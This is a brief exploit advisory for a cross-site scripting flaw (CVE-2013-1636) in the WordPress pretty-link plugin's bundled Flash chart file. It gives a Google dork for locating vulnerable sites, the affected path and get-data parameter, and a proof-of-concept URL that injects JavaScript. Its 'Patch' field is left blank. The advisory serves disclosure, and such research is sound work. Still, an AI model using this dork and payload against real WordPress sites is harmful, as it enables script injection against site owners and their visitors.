Exploit Title: Wordpress pretty-link plugin XSS in SWF
Release Date: 20/02/13
Author: hip [Insight-Labs]
Tested on: XPsp3
Affected version: 1.6.3 before
Google Dork: inurl:/wp-content/plugins/pretty-link/
REF:CVE-2013-1636
Introduction:
Pretty-link is Shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!
XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf
vulnerabile parameter:get-data
POC:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()
Patch: